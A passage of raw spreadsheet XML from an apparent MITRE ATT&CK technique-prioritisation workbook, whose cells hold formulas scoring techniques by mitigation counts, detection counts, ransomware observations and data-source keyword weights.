        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.5714285714285714E-2</v>
      </c>
      <c r="AQ429" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.1269841269841269E-2</v>
      </c>
      <c r="AR429" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.1269841269841269E-2</v>
      </c>
      <c r="AS429" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT429" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU42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30" spans="1:47" ht="32.1">
      <c r="A430" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.6466666666666668E-2</v>
      </c>
      <c r="B430" s="25">
        <f>SUM(H430,M430,V430)*(1+SUM(AE430,AG430,AI430,AK430,AM430))</f>
        <v>0.16466666666666668</v>
      </c>
      <c r="C430" s="25" t="s">
        <v>1623</v>
      </c>
      <c r="D430" s="25" t="s">
        <v>175</v>
      </c>
      <c r="E430" s="25" t="s">
        <v>1624</v>
      </c>
      <c r="F430" s="51">
        <v>1</v>
      </c>
      <c r="G430" s="51">
        <v>1</v>
      </c>
      <c r="H430" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I430">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J430">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K430">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L430">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M430" s="25">
        <v>0</v>
      </c>
      <c r="N430" s="51">
        <v>0</v>
      </c>
      <c r="O430" s="51">
        <v>4</v>
      </c>
      <c r="P430" s="51">
        <v>1</v>
      </c>
      <c r="Q430" s="51">
        <v>0</v>
      </c>
      <c r="R430" s="51"/>
      <c r="S430" s="51">
        <v>0</v>
      </c>
      <c r="T430" s="51"/>
      <c r="U430" s="51">
        <v>0</v>
      </c>
      <c r="V430" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W430">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X430">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y430">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z430">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA430">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB430">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC430" s="29" t="s">
        <v>243</v>
      </c>
      <c r="AD430" s="25" t="str" cm="1">
        <f t="array" ref="AD430">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC430)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE430" s="25">
        <f>IF(AD430="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF430" s="25" t="str" cm="1">
        <f t="array" ref="AF430">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC430)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG430" s="25">
        <f>IF(AF430="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH430" s="25" t="str" cm="1">
        <f t="array" ref="AH430">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC430)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI430" s="25">
        <f>IF(AH430="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ430" s="25" t="str" cm="1">
        <f t="array" ref="AJ430">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC430)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK430" s="25">
        <f>IF(AJ430="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL430" s="25" t="str" cm="1">
        <f t="array" ref="AL430">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC430)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM430" s="25">
        <f>IF(AL430="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN430" s="52">
        <v>0</v>
      </c>
      <c r="AO430" s="51">
        <v>0</v>
      </c>
      <c r="AP430" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.6466666666666668E-2</v>
      </c>
      <c r="AQ430" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.4888888888888897E-2</v>
      </c>
      <c r="AR430" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.4888888888888897E-2</v>
      </c>
      <c r="AS430" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT430" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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31" spans="1:47">
      <c r="A431" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.4047619047619043E-2</v>
      </c>
      <c r="B431" s="25">
        <f>SUM(H431,M431,V431)*(1+SUM(AE431,AG431,AI431,AK431,AM431))</f>
        <v>7.3809523809523811E-2</v>
      </c>
      <c r="C431" s="25" t="s">
        <v>1625</v>
      </c>
      <c r="D431" s="25" t="s">
        <v>1626</v>
      </c>
      <c r="E431" s="25" t="s">
        <v>1627</v>
      </c>
      <c r="F431" s="51">
        <v>0</v>
      </c>
      <c r="G431" s="51">
        <v>1</v>
      </c>
      <c r="H431" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I431">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J431">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K431">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L431">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M431" s="25">
        <v>0</v>
      </c>
      <c r="N431" s="51">
        <v>0</v>
      </c>
      <c r="O431" s="51">
        <v>5</v>
      </c>
      <c r="P431" s="51">
        <v>0</v>
      </c>
      <c r="Q431" s="51">
        <v>0</v>
      </c>
      <c r="R431" s="51"/>
      <c r="S431" s="51">
        <v>0</v>
      </c>
      <c r="T431" s="51"/>
      <c r="U431" s="51">
        <v>0</v>
      </c>
      <c r="V431" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W431">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X431">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y431">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z431">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA431">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB431">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC431" s="29"/>
      <c r="AD431" s="25" t="str" cm="1">
        <f t="array" ref="AD431">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC431)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE431" s="25">
        <f>IF(AD431="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF431" s="25" t="str" cm="1">
        <f t="array" ref="AF431">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC431)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG431" s="25">
        <f>IF(AF431="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH431" s="25" t="str" cm="1">
        <f t="array" ref="AH431">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC431)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI431" s="25">
        <f>IF(AH431="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ431" s="25" t="str" cm="1">
        <f t="array" ref="AJ431">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC431)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK431" s="25">
        <f>IF(AJ431="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL431" s="25" t="str" cm="1">
        <f t="array" ref="AL431">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC431)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM431" s="25">
        <f>IF(AL431="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN431" s="60">
        <v>2</v>
      </c>
      <c r="AO431" s="51">
        <v>1</v>
      </c>
      <c r="AP431" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.4047619047619043E-2</v>
      </c>
      <c r="AQ431" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.4603174603174603E-2</v>
      </c>
      <c r="AR431" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.4603174603174603E-2</v>
      </c>
      <c r="AS431" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT431" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU43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32" spans="1:47" ht="32.1">
      <c r="A432" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3476190476190477E-2</v>
      </c>
      <c r="B432" s="25">
        <f>SUM(H432,M432,V432)*(1+SUM(AE432,AG432,AI432,AK432,AM432))</f>
        <v>0.13476190476190478</v>
      </c>
      <c r="C432" s="25" t="s">
        <v>1628</v>
      </c>
      <c r="D432" s="25" t="s">
        <v>215</v>
      </c>
      <c r="E432" s="25" t="s">
        <v>1629</v>
      </c>
      <c r="F432" s="51">
        <v>1</v>
      </c>
      <c r="G432" s="51">
        <v>1</v>
      </c>
      <c r="H432" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I432">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J432">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K432">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L432">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M432" s="25">
        <v>0</v>
      </c>
      <c r="N432" s="51">
        <v>0</v>
      </c>
      <c r="O432" s="51">
        <v>0</v>
      </c>
      <c r="P432" s="51">
        <v>2</v>
      </c>
      <c r="Q432" s="51">
        <v>0</v>
      </c>
      <c r="R432" s="51">
        <v>14.3</v>
      </c>
      <c r="S432" s="51">
        <v>1</v>
      </c>
      <c r="T432" s="51"/>
      <c r="U432" s="51">
        <v>0</v>
      </c>
      <c r="V432" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619049E-2</v>
      </c>
      <c r="W432">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>1</v>
      </c>
      <c r="X432">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>1.8181818181818181E-2</v>
      </c>
      <c r="Y432">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>1.8181818181818181E-2</v>
      </c>
      <c r="Z432">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA432">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB432">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC432" s="29" t="s">
        <v>1630</v>
      </c>
      <c r="AD432" s="25" t="str" cm="1">
        <f t="array" ref="AD432">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC432)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE432" s="25">
        <f>IF(AD432="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF432" s="25" t="str" cm="1">
        <f t="array" ref="AF432">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC432)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG432" s="25">
        <f>IF(AF432="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH432" s="25" t="str" cm="1">
        <f t="array" ref="AH432">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC432)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI432" s="25">
        <f>IF(AH432="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ432" s="25" t="str" cm="1">
        <f t="array" ref="AJ432">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC432)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK432" s="25">
        <f>IF(AJ432="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL432" s="25" t="str" cm="1">
        <f t="array" ref="AL432">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC432)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM432" s="25">
        <f>IF(AL432="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN432" s="60">
        <v>0</v>
      </c>
      <c r="AO432" s="51">
        <v>0</v>
      </c>
      <c r="AP432" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3476190476190477E-2</v>
      </c>
      <c r="AQ432" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4920634920634923E-2</v>
      </c>
      <c r="AR432" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4920634920634923E-2</v>
      </c>
      <c r="AS432" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT432" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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33" spans="1:47" ht="48">
      <c r="A433" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.8161904761904783E-3</v>
      </c>
      <c r="B433" s="25">
        <f>SUM(H433,M433,V433)*(1+SUM(AE433,AG433,AI433,AK433,AM433))</f>
        <v>7.816190476190478E-2</v>
      </c>
      <c r="C433" s="25" t="s">
        <v>1631</v>
      </c>
      <c r="D433" s="25" t="s">
        <v>1596</v>
      </c>
      <c r="E433" s="25" t="s">
        <v>1632</v>
      </c>
      <c r="F433" s="51">
        <v>0</v>
      </c>
      <c r="G433" s="51">
        <v>1</v>
      </c>
      <c r="H433" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I433">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J433">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K433">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L433">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M433" s="25">
        <v>0</v>
      </c>
      <c r="N433" s="51">
        <v>0</v>
      </c>
      <c r="O433" s="51">
        <v>0</v>
      </c>
      <c r="P433" s="51">
        <v>0</v>
      </c>
      <c r="Q433" s="51">
        <v>0</v>
      </c>
      <c r="R433" s="52" t="s">
        <v>1594</v>
      </c>
      <c r="S433" s="51">
        <v>2</v>
      </c>
      <c r="T433" s="51"/>
      <c r="U433" s="51">
        <v>0</v>
      </c>
      <c r="V433" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619049E-2</v>
      </c>
      <c r="W433">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>2</v>
      </c>
      <c r="X433">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Y433">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Z433">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA433">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB433">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC433" s="29" t="s">
        <v>938</v>
      </c>
      <c r="AD433" s="25" t="str" cm="1">
        <f t="array" ref="AD433">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC433)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE433" s="25">
        <f>IF(AD433="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF433" s="25" t="str" cm="1">
        <f t="array" ref="AF433">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC433)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG433" s="25">
        <f>IF(AF433="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH433" s="25" t="str" cm="1">
        <f t="array" ref="AH433">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC433)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI433" s="25">
        <f>IF(AH433="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ433" s="25" t="str" cm="1">
        <f t="array" ref="AJ433">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC433)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK433" s="25">
        <f>IF(AJ433="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL433" s="25" t="str" cm="1">
        <f t="array" ref="AL433">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC433)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM433" s="25">
        <f>IF(AL433="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN433" s="52">
        <v>0</v>
      </c>
      <c r="AO433" s="51">
        <v>0</v>
      </c>
      <c r="AP433" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.8161904761904783E-3</v>
      </c>
      <c r="AQ433" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.605396825396826E-2</v>
      </c>
      <c r="AR433" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.605396825396826E-2</v>
      </c>
      <c r="AS433" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT433" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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34" spans="1:47">
      <c r="A434" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9047619047619049E-3</v>
      </c>
      <c r="B434" s="25">
        <f>SUM(H434,M434,V434)*(1+SUM(AE434,AG434,AI434,AK434,AM434))</f>
        <v>6.9047619047619052E-2</v>
      </c>
      <c r="C434" s="25" t="s">
        <v>1633</v>
      </c>
      <c r="D434" s="25" t="s">
        <v>1593</v>
      </c>
      <c r="E434" s="25" t="s">
        <v>686</v>
      </c>
      <c r="F434" s="51">
        <v>0</v>
      </c>
      <c r="G434" s="51">
        <v>1</v>
      </c>
      <c r="H434" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I434">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J434">
